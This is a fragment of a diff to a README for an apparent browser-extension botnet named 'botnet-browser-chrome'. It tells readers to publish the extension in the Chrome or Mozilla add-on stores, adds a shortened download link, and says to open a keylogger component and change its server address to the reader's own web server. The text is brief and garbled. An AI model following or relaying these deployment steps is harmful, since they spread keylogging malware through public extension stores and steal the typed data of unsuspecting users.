hakanonymos/botnet-browser-chrome/README.md

 -publish your extension in  chrome web store or adon mozilla ( video can found here http://bit.ly/2HnfniO )

-# how it works ? this projet was abandoned
+# how it works ? this projet was abandoned , download here https://bit.ly/2EQMees
 1) open keylog

 change http://1127.0.0.1     to your web server